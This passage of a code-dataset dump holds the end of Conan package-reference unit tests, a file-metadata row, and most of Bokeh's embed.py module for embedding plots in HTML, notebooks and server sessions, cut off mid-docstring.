        # are invalid either way, but likely not for the intended reason.
        self.assertRaises(ConanException, ConanFileReference.loads,
                          "opencv%s/2.4.10@laso/testing" % "A" * 40)
        self.assertRaises(ConanException, ConanFileReference.loads,
                          "opencv/2.4.10%s@laso/testing" % "A" * 40)
        self.assertRaises(ConanException, ConanFileReference.loads,
                          "opencv/2.4.10@laso%s/testing" % "A" * 40)
        self.assertRaises(ConanException, ConanFileReference.loads,
                          "opencv/2.4.10@laso/testing%s" % "A" * 40)
        # Separator misuse: '/' where '@' belongs and vice versa.
        self.assertRaises(ConanException, ConanFileReference.loads, "opencv/2.4.10/laso/testing")
        self.assertRaises(ConanException, ConanFileReference.loads, "opencv/2.4.10/laso/test#1")
        self.assertRaises(ConanException, ConanFileReference.loads, "opencv@2.4.10/laso/test")
        self.assertRaises(ConanException, ConanFileReference.loads, "opencv/2.4.10/laso@test")

    def test_revisions(self):
        # Recipe revision after '#', on full and on user/channel-less refs.
        ref = ConanFileReference.loads("opencv/2.4.10@lasote/testing#23")
        self.assertEqual(ref.channel, "testing")
        self.assertEqual(ref.revision, "23")

        ref = ConanFileReference.loads("opencv/2.4.10#23")
        self.assertIsNone(ref.channel)
        self.assertIsNone(ref.user)
        self.assertEqual(ref.name, "opencv")
        self.assertEqual(ref.version, "2.4.10")
        self.assertEqual(ref.revision, "23")

        # The revision can also be passed positionally to the constructor.
        ref = ConanFileReference("opencv", "2.3", "lasote", "testing", "34")
        self.assertEqual(ref.revision, "34")

        # PackageReference carries a package revision after the second '#'.
        pref = PackageReference.loads("opencv/2.4.10@lasote/testing#23:123123123#989")
        self.assertEqual(pref.revision, "989")
        self.assertEqual(pref.ref.revision, "23")

        pref = PackageReference(ref, "123123123#989")
        self.assertEqual(pref.ref.revision, "34")

    def test_equal(self):
        # Differing recipe revisions make references unequal.
        ref = ConanFileReference.loads("opencv/2.4.10@lasote/testing#23")
        ref2 = ConanFileReference.loads("opencv/2.4.10@lasote/testing#232")
        self.assertFalse(ref == ref2)
        self.assertTrue(ref != ref2)

        # Revision present vs absent is also unequal, in both directions.
        ref = ConanFileReference.loads("opencv/2.4.10@lasote/testing")
        ref2 = ConanFileReference.loads("opencv/2.4.10@lasote/testing#232")
        self.assertFalse(ref == ref2)
        self.assertTrue(ref != ref2)
        self.assertTrue(ref2 != ref)

        # Identical references compare equal, with and without revisions.
        ref = ConanFileReference.loads("opencv/2.4.10@lasote/testing")
        ref2 = ConanFileReference.loads("opencv/2.4.10@lasote/testing")
        self.assertTrue(ref == ref2)
        self.assertFalse(ref != ref2)

        ref = ConanFileReference.loads("opencv/2.4.10@lasote/testing#23")
        ref2 = ConanFileReference.loads("opencv/2.4.10@lasote/testing#23")
        self.assertTrue(ref == ref2)
        self.assertFalse(ref != ref2)
class ConanNameTestCase(unittest.TestCase):
    """Field-level validation rules enforced by ConanName."""

    def _check_invalid_format(self, value, *args):
        # Expect validate_name() to reject *value* with the "Valid names" message.
        with six.assertRaisesRegex(self, InvalidNameException, "Valid names"):
            ConanName.validate_name(value, *args)

    def _check_invalid_version(self, name, version):
        # Expect validate_version() to reject *version* for recipe *name*.
        with six.assertRaisesRegex(self, InvalidNameException, "invalid version number"):
            ConanName.validate_version(version, name)

    def _check_invalid_type(self, value):
        # Non-string inputs are rejected with a type-specific message.
        with six.assertRaisesRegex(self, InvalidNameException, "is not a string"):
            ConanName.validate_name(value)

    def test_validate_name(self):
        # validate_name() returns None on success.
        self.assertIsNone(ConanName.validate_name("string.dot.under-score.123"))
        self.assertIsNone(ConanName.validate_name("_underscore+123"))
        self.assertIsNone(ConanName.validate_name("*"))
        # Length boundaries are inclusive.
        self.assertIsNone(ConanName.validate_name("a" * ConanName._min_chars))
        self.assertIsNone(ConanName.validate_name("a" * ConanName._max_chars))
        self.assertIsNone(ConanName.validate_name("a" * 50))  # Regression test

    def test_validate_name_invalid_format(self):
        self._check_invalid_format("-no.dash.start")
        # One character below/above the allowed length range.
        self._check_invalid_format("a" * (ConanName._min_chars - 1))
        self._check_invalid_format("a" * (ConanName._max_chars + 1))

    def test_validate_name_invalid_type(self):
        self._check_invalid_type(123.34)
        self._check_invalid_type(("item1", "item2",))

    def test_validate_name_version(self):
        # Bracketed version-range expressions are accepted.
        self.assertIsNone(ConanName.validate_version("name", "[vvvv]"))

    def test_validate_name_version_invalid(self):
        # Unbalanced brackets are rejected.
        self._check_invalid_version("name", "[no.close.bracket")
        self._check_invalid_version("name", "no.open.bracket]")
class CheckValidRefTest(unittest.TestCase):
    """check_valid_ref(): which reference strings/patterns are accepted."""

    def test_string(self):
        # Complete references are valid; bracketed version ranges included.
        self.assertTrue(check_valid_ref("package/1.0@user/channel"))
        self.assertTrue(check_valid_ref("package/1.0@user/channel"))
        self.assertTrue(check_valid_ref("package/[*]@user/channel"))
        self.assertTrue(check_valid_ref("package/[>1.0]@user/channel"))
        self.assertTrue(check_valid_ref("package/[1.*]@user/channel"))

        # Patterns are invalid
        self.assertFalse(check_valid_ref("package/*@user/channel"))
        self.assertFalse(check_valid_ref("package/1.0@user/*"))
        self.assertFalse(check_valid_ref("package/1.0@user/chan*"))
        self.assertFalse(check_valid_ref("package/[>1.0]@user/chan*"))
        self.assertFalse(check_valid_ref("*/1.0@user/channel"))
        self.assertFalse(check_valid_ref("package*/1.0@user/channel"))

        # * pattern is valid in non stric_mode
        self.assertTrue(check_valid_ref("package/*@user/channel", strict_mode=False))
        self.assertTrue(check_valid_ref("package/*@user/*", strict_mode=False))

        # But other patterns are not valid in non stric_mode
        self.assertFalse(check_valid_ref("package/1.0@user/chan*", strict_mode=False))

    def test_incomplete_refs(self):
        # Only name/version without @user/channel: valid in lax mode only.
        self.assertTrue(check_valid_ref("package/1.0", strict_mode=False))
        self.assertFalse(check_valid_ref("package/1.0"))
        self.assertFalse(check_valid_ref("package/1.0@user"))
        self.assertFalse(check_valid_ref("package/1.0@/channel"))
        self.assertFalse(check_valid_ref("lib@#rev"))
class GetReferenceFieldsTest(unittest.TestCase):
    """get_reference_fields() -> (name, version, user, channel, revision)."""

    def test_fields_complete(self):
        # No matter if we say we allow partial references for "user/channel", if we
        # provide this patterns everything is parsed correctly
        for user_channel_input in [True, False]:
            tmp = get_reference_fields("lib/1.0@user", user_channel_input=user_channel_input)
            self.assertEqual(tmp, ("lib", "1.0", "user", None, None))

            tmp = get_reference_fields("lib/1.0@/channel", user_channel_input=user_channel_input)
            self.assertEqual(tmp, ("lib", "1.0", None, "channel", None))

            # FIXME: 2.0 in this case lib is considered the version, weird.
            tmp = get_reference_fields("lib@#rev", user_channel_input=user_channel_input)
            self.assertEqual(tmp, (None, "lib", None, None, "rev"))

            # FIXME: 2.0 in this case lib is considered the version, weird.
            tmp = get_reference_fields("lib@/channel#rev", user_channel_input=user_channel_input)
            self.assertEqual(tmp, (None, "lib", None, "channel", "rev"))

            tmp = get_reference_fields("/1.0@user/#rev", user_channel_input=user_channel_input)
            self.assertEqual(tmp, (None, "1.0", "user", None, "rev"))

            # Empty separators yield all-None fields.
            tmp = get_reference_fields("/@/#", user_channel_input=user_channel_input)
            self.assertEqual(tmp, (None, None, None, None, None))

            tmp = get_reference_fields("lib/1.0@/", user_channel_input=user_channel_input)
            self.assertEqual(tmp, ("lib", "1.0", None, None, None))

            tmp = get_reference_fields("lib/1.0@", user_channel_input=user_channel_input)
            self.assertEqual(tmp, ("lib", "1.0", None, None, None))

            tmp = get_reference_fields("lib/@", user_channel_input=user_channel_input)
            self.assertEqual(tmp, ("lib", None, None, None, None))

            tmp = get_reference_fields("/@", user_channel_input=user_channel_input)
            self.assertEqual(tmp, (None, None, None, None, None))

            tmp = get_reference_fields("@", user_channel_input=user_channel_input)
            self.assertEqual(tmp, (None, None, None, None, None))

            tmp = get_reference_fields("lib/1.0@user/channel#rev",
                                       user_channel_input=user_channel_input)
            self.assertEqual(tmp, ("lib", "1.0", "user", "channel", "rev"))

            # FIXME: 2.0 in this case lib is considered the version, weird.
            tmp = get_reference_fields("lib@user/channel", user_channel_input=user_channel_input)
            self.assertEqual(tmp, (None, "lib", "user", "channel", None))

            tmp = get_reference_fields("/@/#", user_channel_input=user_channel_input)
            self.assertEqual(tmp, (None, None, None, None, None))

    def test_only_user_channel(self):
        # With user_channel_input=True, a bare "user/channel" string fills
        # only the user/channel slots.
        tmp = get_reference_fields("user/channel", user_channel_input=True)
        self.assertEqual(tmp, (None, None, "user", "channel", None))

        tmp = get_reference_fields("user", user_channel_input=True)
        self.assertEqual(tmp, (None, None, "user", None, None))

        tmp = get_reference_fields("/channel", user_channel_input=True)
        self.assertEqual(tmp, (None, None, None, "channel", None))

        # NOTE(review): indentation was lost in this copy of the file; these
        # two asserts sit in this method by position, but they exercise
        # check_valid_ref and may belong to another test -- confirm upstream.
        ref_pattern = ConanFileReference.loads("package/*@user/channel")
        self.assertFalse(check_valid_ref(ref_pattern, strict_mode=False))
class CompatiblePrefTest(unittest.TestCase):
    """PackageReference.is_compatible_with(): a reference is compatible with
    another that only *completes* missing revision info, never changes it."""

    def test_compatible(self):
        def ok(pref1, pref2):
            # Helper: parse both strings, ask pref1 whether pref2 is compatible.
            pref1 = PackageReference.loads(pref1)
            pref2 = PackageReference.loads(pref2)
            return pref1.is_compatible_with(pref2)

        # Same ref is ok
        self.assertTrue(ok("package/1.0@user/channel#RREV1:packageid1#PREV1",
                           "package/1.0@user/channel#RREV1:packageid1#PREV1"))
        # Change PREV is not ok
        self.assertFalse(ok("package/1.0@user/channel#RREV1:packageid1#PREV1",
                            "package/1.0@user/channel#RREV1:packageid1#PREV2"))
        # Different ref is not ok
        self.assertFalse(ok("packageA/1.0@user/channel#RREV1:packageid1#PREV1",
                            "packageB/1.0@user/channel#RREV1:packageid1#PREV1"))
        # Different ref is not ok
        self.assertFalse(ok("packageA/1.0@user/channel#RREV1:packageid1",
                            "packageB/1.0@user/channel#RREV1:packageid1#PREV1"))
        # Different package_id is not ok
        self.assertFalse(ok("packageA/1.0@user/channel#RREV1:packageid1",
                            "packageA/1.0@user/channel#RREV1:packageid2#PREV1"))
        # Completed PREV is ok
        self.assertTrue(ok("packageA/1.0@user/channel#RREV1:packageid1",
                           "packageA/1.0@user/channel#RREV1:packageid1#PREV1"))
        # But only in order, the second ref cannot remove PREV
        self.assertFalse(ok("packageA/1.0@user/channel#RREV1:packageid1#PREV1",
                            "packageA/1.0@user/channel#RREV1:packageid1"))
        # Completing RREV is also OK
        self.assertTrue(ok("packageA/1.0@user/channel:packageid1",
                           "packageA/1.0@user/channel#RREV1:packageid1"))
        # Completing RREV and PREV is also OK
        self.assertTrue(ok("packageA/1.0@user/channel:packageid1",
                           "packageA/1.0@user/channel#RREV:packageid1#PREV"))
| 47.94198 | 101 | 0.663202 |
faf68bce84dcda80469d955f8ac519566876f05c | 28,403 | py | Python | bokeh/embed.py | chinasaur/bokeh | d3662a871679adf2cc8f95b80a51120db4dcccd4 | [
"BSD-3-Clause"
] | null | null | null | bokeh/embed.py | chinasaur/bokeh | d3662a871679adf2cc8f95b80a51120db4dcccd4 | [
"BSD-3-Clause"
] | null | null | null | bokeh/embed.py | chinasaur/bokeh | d3662a871679adf2cc8f95b80a51120db4dcccd4 | [
"BSD-3-Clause"
] | null | null | null | ''' Provide functions to embed Bokeh models (e.g., plots, widget, layouts)
in various different ways.
There are a number of different combinations of options when embedding
Bokeh plots. The data for the plot can be contained in the document,
or on a Bokeh server, or in a sidecar JavaScript file. Likewise, BokehJS
may be inlined in the document, or loaded from CDN or a Bokeh server.
The functions in ``bokeh.embed`` provide functionality to embed in all
these different cases.
'''
from __future__ import absolute_import
from contextlib import contextmanager
from collections import Sequence
from warnings import warn
import re
from six import string_types
from six.moves.urllib.parse import urlparse
from .core.templates import (
AUTOLOAD_JS, AUTOLOAD_NB_JS, AUTOLOAD_TAG,
FILE, NOTEBOOK_DIV, PLOT_DIV, DOC_JS, SCRIPT_TAG
)
from .core.json_encoder import serialize_json
from .document import Document, DEFAULT_TITLE
from .model import Model
from .resources import BaseResources, DEFAULT_SERVER_HTTP_URL, _SessionCoordinates
from .settings import settings
from .util.deprecation import deprecated
from .util.string import encode_utf8, format_docstring
from .util.serialization import make_id
from .util.compiler import bundle_all_models
def _indent(text, n=2):
return "\n".join([ " "*n + line for line in text.split("\n") ])
def _wrap_in_safely(code):
    """Wrap JS *code* in a ``Bokeh.safely(...)`` guard, indenting it by 2."""
    body = _indent(code, 2)
    return "Bokeh.safely(function() {\n%s\n});" % body
def _wrap_in_onload(code):
    """Wrap JS *code* so it runs once the DOM is ready (or immediately if
    the document has already finished loading)."""
    template = (
        "(function() {\n"
        "  var fn = function() {\n"
        "%s\n"
        "  };\n"
        '  if (document.readyState != "loading") fn();\n'
        '  else document.addEventListener("DOMContentLoaded", fn);\n'
        "})();\n"
    )
    return template % _indent(code, 4)
def _wrap_in_script_tag(js):
    # Render the JS code through the shared SCRIPT_TAG template.
    return SCRIPT_TAG.render(js_code=js)
@contextmanager
def _ModelInDocument(models, apply_theme=None):
    """Temporarily attach each of *models* to a shared Document (finding an
    existing one or creating a fresh one), optionally applying a theme, and
    undo both on exit.

    ``apply_theme`` may be a theme object, ``None`` (leave as-is), or the
    ``FromCurdoc`` sentinel meaning "use bokeh.io.curdoc().theme".
    """
    doc = _find_existing_docs(models)
    old_theme = doc.theme

    if apply_theme is FromCurdoc:
        # Local import presumably avoids a circular import; the trailing bare
        # ``curdoc`` expression is a no-op reference (likely lint appeasement).
        from .io import curdoc; curdoc
        doc.theme = curdoc().theme
    elif apply_theme is not None:
        doc.theme = apply_theme

    # Remember exactly which models we attached, so only those get detached.
    models_to_dedoc = _add_doc_to_models(doc, models)
    yield models
    # NOTE(review): no try/finally -- if the body raises, the temporary roots
    # and theme are not restored; confirm that is intended.
    for model in models_to_dedoc:
        doc.remove_root(model, apply_theme)
    doc.theme = old_theme
@contextmanager
def _ModelInEmptyDocument(model, apply_theme=None):
    """Temporarily move *model* (and everything it references) into a fresh,
    empty Document, restoring the original document pointers on exit.
    """
    # Local import (Document is also imported at module level); presumably
    # kept for import-cycle reasons -- confirm.
    from .document import Document
    doc = _find_existing_docs([model])

    if apply_theme is FromCurdoc:
        # Bare ``curdoc`` after the import is a no-op reference (likely lint
        # appeasement).
        from .io import curdoc; curdoc
        doc.theme = curdoc().theme
    elif apply_theme is not None:
        doc.theme = apply_theme

    # Detach the model and its references by clearing the private _document
    # pointers directly (bypasses the normal add/remove root machinery).
    model._document = None
    for ref in model.references():
        ref._document = None
    empty_doc = Document()
    empty_doc.add_root(model)

    yield model

    # Reattach to the original document.
    model._document = doc
    for ref in model.references():
        ref._document = doc
def _find_existing_docs(models):
    """Return the one Document that *models* already belong to.

    Creates a fresh Document if none of them is owned yet; raises
    ``RuntimeError`` if they span more than one document.
    """
    docs = {m if isinstance(m, Document) else m.document for m in models}
    docs.discard(None)

    if not docs:
        # nothing is owned yet -- hand back a brand new document
        return Document()
    if len(docs) == 1:
        # everything agrees on a single document; use it
        return docs.pop()
    # conflicting ownership is a usage error
    raise RuntimeError('Multiple items in models contain documents or are '
                       'themselves documents. (Models must be owned by only a '
                       'single document). This may indicate a usage error.')
def _add_doc_to_models(doc, models):
    """Add each unowned Model in *models* as a root of *doc*.

    Returns the list of models that were actually added (so the caller can
    remove them again later). Models that already have a document are left
    alone. Raises ``RuntimeError`` if a sub-model is owned elsewhere.
    """
    models_to_dedoc = []
    for model in models:
        if isinstance(model, Model):
            if model.document is None:
                try:
                    doc.add_root(model)
                    models_to_dedoc.append(model)
                except RuntimeError as e:
                    # NOTE(review): group(0) includes the surrounding parens,
                    # and .search() may return None if the message format
                    # changes -- this would then raise AttributeError
                    child = re.search('\((.*)\)', str(e)).group(0)
                    msg = ('Sub-model {0} of the root model {1} is already owned '
                           'by another document (Models must be owned by only a '
                           'single document). This may indicate a usage '
                           'error.'.format(child, model))
                    raise RuntimeError(msg)
    return models_to_dedoc
class FromCurdoc: pass
def components(models, wrap_script=True, wrap_plot_info=True, theme=FromCurdoc):
    ''' Return HTML components to embed a Bokeh plot. The data for the plot is
    stored directly in the returned HTML.

    An example can be found in examples/embed/embed_multiple.py

    .. note::
        The returned components assume that BokehJS resources are
        **already loaded**.

    Args:
        models (Model|list|dict|tuple) :
            A single Model, a list/tuple of Models, or a dictionary of keys and Models.

        wrap_script (boolean, optional) :
            If True, the returned javascript is wrapped in a script tag.
            (default: True)

        wrap_plot_info (boolean, optional) : If True, returns ``<div>`` strings.
            Otherwise, return dicts that can be used to build your own divs.
            (default: True)

            If False, the returned dictionary contains the following information:

            .. code-block:: python

                {
                    'modelid':  'The model ID, used with Document.get_model_by_id',
                    'elementid': 'The css identifier the BokehJS will look for to target the plot',
                    'docid': 'Used by Bokeh to find the doc embedded in the returned script',
                }

        theme (Theme, optional) :
            Defaults to the ``Theme`` instance in the current document.
            Setting this to ``None`` uses the default theme or the theme
            already specified in the document. Any other value must be an
            instance of the ``Theme`` class.

    Returns:
        UTF-8 encoded *(script, div[s])* or *(raw_script, plot_info[s])*

    Examples:

        With default wrapping parameter values:

        .. code-block:: python

            components(plot)
            # => (script, plot_div)

            components((plot1, plot2))
            # => (script, (plot1_div, plot2_div))

            components({"Plot 1": plot1, "Plot 2": plot2})
            # => (script, {"Plot 1": plot1_div, "Plot 2": plot2_div})

    Examples:

        With wrapping parameters set to ``False``:

        .. code-block:: python

            components(plot, wrap_script=False, wrap_plot_info=False)
            # => (javascript, plot_dict)

            components((plot1, plot2), wrap_script=False, wrap_plot_info=False)
            # => (javascript, (plot1_dict, plot2_dict))

            components({"Plot 1": plot1, "Plot 2": plot2}, wrap_script=False, wrap_plot_info=False)
            # => (javascript, {"Plot 1": plot1_dict, "Plot 2": plot2_dict})

    '''
    # 1) Convert single items and dicts into list

    was_single_object = isinstance(models, Model) or isinstance(models, Document)
    # converts single to list
    models = _check_models(models, allow_dict=True)
    # now convert dict to list, saving keys in the same order
    model_keys = None
    if isinstance(models, dict):
        model_keys = models.keys()
        values = []
        # don't just use .values() to ensure we are in the same order as key list
        for k in model_keys:
            values.append(models[k])
        models = values

    # 2) Append models to one document. Either pre-existing or new and render
    with _ModelInDocument(models, apply_theme=theme):
        (docs_json, render_items) = _standalone_docs_json_and_render_items(models)

    script = bundle_all_models()
    script += _script_for_render_items(docs_json, render_items)
    if wrap_script:
        script = _wrap_in_script_tag(script)
    script = encode_utf8(script)

    if wrap_plot_info:
        results = list(_div_for_render_item(item) for item in render_items)
    else:
        results = render_items

    # 3) convert back to the input shape

    if was_single_object:
        return script, results[0]
    elif model_keys is not None:
        result = {}
        for (key, value) in zip(model_keys, results):
            result[key] = value
        return script, result
    else:
        return script, tuple(results)
def _use_widgets(objs):
    """Whether any of *objs* (Documents or Models) references a Widget."""
    from .models.widgets import Widget

    for obj in objs:
        if isinstance(obj, Document):
            # recurse into the document's root models
            if _use_widgets(obj.roots):
                return True
        elif any(isinstance(ref, Widget) for ref in obj.references()):
            return True
    return False
def _use_gl(objs):
    """Whether any of *objs* references a Plot with WebGL enabled."""
    from .models.plots import Plot

    for obj in objs:
        if isinstance(obj, Document):
            # recurse into the document's root models
            if _use_gl(obj.roots):
                return True
        elif any(isinstance(ref, Plot) and ref.webgl for ref in obj.references()):
            return True
    return False
def _bundle_for_objs_and_resources(objs, resources):
    """Compute the ``(bokeh_js, bokeh_css)`` bundle strings for *objs*.

    *resources* may be a single ``BaseResources`` (used for both JS and CSS)
    or a ``(js_resources, css_resources)`` pair where either element may be
    None. Widget/GL components are trimmed or added based on what *objs*
    actually use; when *objs* is falsy all components are forced on.
    """
    if isinstance(resources, BaseResources):
        js_resources = css_resources = resources
    elif isinstance(resources, tuple) and len(resources) == 2 and all(r is None or isinstance(r, BaseResources) for r in resources):
        js_resources, css_resources = resources
        if js_resources and not css_resources:
            warn('No Bokeh CSS Resources provided to template. If required you will need to provide them manually.')
        if css_resources and not js_resources:
            warn('No Bokeh JS Resources provided to template. If required you will need to provide them manually.')
    else:
        raise ValueError("expected Resources or a pair of optional Resources, got %r" % resources)

    from copy import deepcopy

    # XXX: force all components on server and in notebook, because we don't know in advance what will be used
    use_widgets = _use_widgets(objs) if objs else True
    use_gl = _use_gl(objs) if objs else True

    if js_resources:
        # deepcopy so mutating .components does not alter the caller's object
        js_resources = deepcopy(js_resources)
        if not use_widgets and "bokeh-widgets" in js_resources.components:
            js_resources.components.remove("bokeh-widgets")
        if use_gl and "bokeh-gl" not in js_resources.components:
            js_resources.components.append("bokeh-gl")
        bokeh_js = js_resources.render_js()
    else:
        bokeh_js = None

    if css_resources:
        css_resources = deepcopy(css_resources)
        if not use_widgets and "bokeh-widgets" in css_resources.components:
            css_resources.components.remove("bokeh-widgets")
        bokeh_css = css_resources.render_css()
    else:
        bokeh_css = None

    return bokeh_js, bokeh_css
def notebook_div(model, notebook_comms_target=None, theme=FromCurdoc):
    ''' Return HTML for a div that will display a Bokeh plot in a
    Jupyter/Zeppelin Notebook. notebook_comms_target is only supported
    in Jupyter for now.

    The data for the plot is stored directly in the returned HTML.

    Args:
        model (Model) : Bokeh object to render

        notebook_comms_target (str, optional) :
            A target name for a Jupyter Comms object that can update
            the document that is rendered to this notebook div

        theme (Theme, optional) :
            Defaults to the ``Theme`` instance in the current document.
            Setting this to ``None`` uses the default theme or the theme
            already specified in the document. Any other value must be an
            instance of the ``Theme`` class.

    Returns:
        UTF-8 encoded HTML text for a ``<div>``

    .. note::
        Assumes :func:`~bokeh.util.notebook.load_notebook` or the equivalent
        has already been executed.

    '''
    model = _check_one_model(model)

    # Append models to one document. Either pre-existing or new and render
    with _ModelInEmptyDocument(model, apply_theme=theme):
        (docs_json, render_items) = _standalone_docs_json_and_render_items([model])

    item = render_items[0]
    if notebook_comms_target:
        item['notebook_comms_target'] = notebook_comms_target
    else:
        # template expects a string, not None
        notebook_comms_target = ''

    script = _wrap_in_onload(DOC_JS.render(
        docs_json=serialize_json(docs_json),
        render_items=serialize_json(render_items)
    ))

    js = AUTOLOAD_NB_JS.render(
        comms_target = notebook_comms_target,
        js_urls = [],
        css_urls = [],
        js_raw = [script],
        css_raw = "",
        elementid = item['elementid']
    )
    div = _div_for_render_item(item)

    html = NOTEBOOK_DIV.render(
        plot_script = js,
        plot_div = div,
    )
    return encode_utf8(html)
def file_html(models,
              resources,
              title=None,
              template=FILE,
              template_variables=None):
    ''' Return an HTML document that embeds Bokeh Model or Document objects.

    The data for the plot is stored directly in the returned HTML, with
    support for customizing the JS/CSS resources independently and
    customizing the jinja2 template.

    Args:
        models (Model or Document or list) : Bokeh object or objects to render
            typically a Model or Document

        resources (Resources or tuple(JSResources or None, CSSResources or None)) :
            a resource configuration for Bokeh JS & CSS assets.

        title (str, optional) : a title for the HTML document ``<title>`` tags or None. (default: None)
            If None, attempt to automatically find the Document title from the given plot objects.

        template (Template, optional) : HTML document template (default: FILE)
            A Jinja2 Template, see bokeh.core.templates.FILE for the required
            template parameters

        template_variables (dict, optional) : variables to be used in the Jinja2
            template. If used, the following variable names will be overwritten:
            title, bokeh_js, bokeh_css, plot_script, plot_div

    Returns:
        UTF-8 encoded HTML

    '''
    # use None (not a mutable {}) as the default to avoid sharing one dict
    # across calls; substitute a fresh dict per invocation
    if template_variables is None:
        template_variables = {}

    models = _check_models(models)

    with _ModelInDocument(models):
        (docs_json, render_items) = _standalone_docs_json_and_render_items(models)
        title = _title_from_models(models, title)
        bundle = _bundle_for_objs_and_resources(models, resources)
        return _html_page_for_render_items(bundle, docs_json, render_items, title=title,
                                           template=template, template_variables=template_variables)
# TODO rename this "standalone"?
def autoload_static(model, resources, script_path):
    ''' Return JavaScript code and a script tag that can be used to embed
    Bokeh Plots.

    The data for the plot is stored directly in the returned JavaScript code.

    Args:
        model (Model or Document) : the object to render
        resources (Resources) : resource configuration for the JS/CSS assets
        script_path (str) : the URL path the JS will be served from (used in
            the returned ``<script src=...>`` tag)

    Returns:
        (js, tag) :
            JavaScript code to be saved at ``script_path`` and a ``<script>``
            tag to load it

    Raises:
        ValueError

    '''
    # TODO: maybe warn that it's not exactly useful, but technically possible
    # if resources.mode == 'inline':
    #     raise ValueError("autoload_static() requires non-inline resources")

    model = _check_one_model(model)

    with _ModelInDocument([model]):
        (docs_json, render_items) = _standalone_docs_json_and_render_items([model])

    bundle = bundle_all_models()
    script = _script_for_render_items(docs_json, render_items)
    item = render_items[0]

    js = _wrap_in_onload(AUTOLOAD_JS.render(
        js_urls = resources.js_files,
        css_urls = resources.css_files,
        js_raw = resources.js_raw + [bundle, script],
        css_raw = resources.css_raw_str,
        elementid = item['elementid'],
    ))

    tag = AUTOLOAD_TAG.render(
        src_path = script_path,
        elementid = item['elementid'],
        modelid = item.get('modelid', ''),
        docid = item.get('docid', ''),
    )

    return encode_utf8(js), encode_utf8(tag)
def autoload_server(model=None, app_path=None, session_id=None, url="default", relative_urls=False):
    ''' Return a script tag that embeds content from a Bokeh server session.

    Bokeh apps embedded using ``autoload_server`` will NOT set the browser
    window title.

    .. note::
        Typically you will not want to save or re-use the output of this
        function for different or multiple page loads.

    Args:
        model (Model, optional) : The object to render from the session

            If ``None`` an entire document is rendered. (default: ``None``)

            If you supply a specific model to render, you must also supply the
            session ID containing that model.

            Supplying a model is usually only useful when embedding
            a specific session that was previously created using the
            ``bokeh.client`` API.

        session_id (str, optional) : A server session ID (default: None)

            If ``None``, let the server auto-generate a random session ID.

            Supplying a session id is usually only useful when embedding
            a specific session that was previously created using the
            ``bokeh.client`` API.

        url (str, optional) : A URL to a Bokeh application on a Bokeh server

            If ``None`` the default URL ``{DEFAULT_SERVER_HTTP_URL}`` will be used.

        relative_urls (bool, optional) :
            Whether to use relative URLs for resources.

            If ``True`` the links generated for resources such a BokehJS
            JavaScript and CSS will be relative links.

            This should normally be set to ``False``, but must be set to
            ``True`` in situations where only relative URLs will work. E.g.
            when running the Bokeh behind reverse-proxies under certain
            configurations

    Returns:
        A ``<script>`` tag that will execute an autoload script loaded
        from the Bokeh Server.

    Examples:

        In the simplest and most common case, we wish to embed Bokeh server
        application by providing the URL to where it is located.

        Suppose the app is running (perhaps behind Nginx or some other proxy)
        at ``http://app.server.org/foo/myapp``. We wish to embed this app in
        a page at ``mysite.com``. The following will provide an HTML script
        tag to do that, that can be included in ``mysite.com``:

        .. code-block:: python

            script = autoload_server(url="http://app.server.org/foo/myapp")

        Note that in order for this embedding to work, the Bokeh server needs
        to have been configured to allow connections from the public URL where
        the embedding happens. In this case, if the autoload script is run from
        a page located at ``http://mysite.com/report`` then the Bokeh server
        must have been started with an ``--allow-websocket-origin`` option
        specifically allowing websocket connections from pages that originate
        from ``mysite.com``:

        .. code-block:: sh

            bokeh serve mayapp.py --allow-websocket-origin=mysite.com

        If an autoload script runs from an origin that has not been allowed,
        the Bokeh server will return a 403 error.

        It's also possible to initiate sessions on a Bokeh server from
        Python, using the functions :func:`~bokeh.client.push_session` and
        :func:`~bokeh.client.push_session`. This can be useful in advanced
        situations where you may want to "set up" the session before you
        embed it. For example, you might to load up a session and modify
        ``session.document`` in some way (perhaps adding per-user data).

        In such cases you will pass the session id as an argument as well:

        .. code-block:: python

           script = autoload_server(session_id="some_session_id",
                                    url="http://app.server.org/foo/myapp")

        .. warning::
            It is typically a bad idea to re-use the same ``session_id`` for
            every page load. This is likely to create scalability and security
            problems, and will cause "shared Google doc" behaviour, which is
            typically not desired.

    '''
    # deprecated app_path argument: fold it into the url
    if app_path is not None:
        deprecated((0, 12, 5), "app_path", "url", "Now pass entire app URLS in the url arguments, e.g. 'url=http://foo.com:5010/bar/myapp'")
        if not app_path.startswith("/"):
            app_path = "/" + app_path
        url = url + app_path

    coords = _SessionCoordinates(url=url, session_id=session_id)

    elementid = make_id()

    # empty model_id means render the entire doc from session_id
    model_id = ""
    if model is not None:
        model_id = model._id

    if model_id and session_id is None:
        raise ValueError("A specific model was passed to autoload_server() but no session_id; "
                         "this doesn't work because the server will generate a fresh session "
                         "which won't have the model in it.")

    src_path = coords.url + "/autoload.js?bokeh-autoload-element=" + elementid

    # re-derive app_path from the (possibly already-extended) url
    if url != "default":
        app_path = urlparse(url).path.rstrip("/")
        if not app_path.startswith("/"):
            app_path = "/" + app_path
        src_path += "&bokeh-app-path=" + app_path

    if not relative_urls:
        src_path += "&bokeh-absolute-url=" + coords.url

    # we want the server to generate the ID, so the autoload script
    # can be embedded in a static page while every user still gets
    # their own session. So we omit bokeh-session-id rather than
    # using a generated ID.
    if coords.session_id_allowing_none is not None:
        # at this point session_id is non-None (it was passed through coords)
        src_path = src_path + "&bokeh-session-id=" + session_id

    tag = AUTOLOAD_TAG.render(
        src_path = src_path,
        app_path = app_path,
        elementid = elementid,
        modelid = model_id,
    )

    return encode_utf8(tag)

autoload_server.__doc__ = format_docstring(autoload_server.__doc__, DEFAULT_SERVER_HTTP_URL=DEFAULT_SERVER_HTTP_URL)
def _script_for_render_items(docs_json, render_items, app_path=None, absolute_url=None):
    """Render the JS that materializes *docs_json* / *render_items*,
    wrapped in Bokeh.safely (outside dev mode) and an onload guard."""
    code = DOC_JS.render(
        docs_json=serialize_json(docs_json),
        render_items=serialize_json(render_items),
        app_path=app_path,
        absolute_url=absolute_url,
    )

    if not settings.dev:
        code = _wrap_in_safely(code)

    return _wrap_in_onload(code)
def _html_page_for_render_items(bundle, docs_json, render_items, title,
                                template=FILE, template_variables=None):
    """Render a complete HTML page (via the jinja2 *template*) embedding the
    given serialized documents and render items.

    Args:
        bundle (tuple) : ``(bokeh_js, bokeh_css)`` resource strings
        docs_json (dict) : serialized documents keyed by doc id
        render_items (list of dict) : one entry per target div
        title (str or None) : page title; ``DEFAULT_TITLE`` when None
        template (Template, optional) : jinja2 template to render
        template_variables (dict, optional) : extra template variables; the
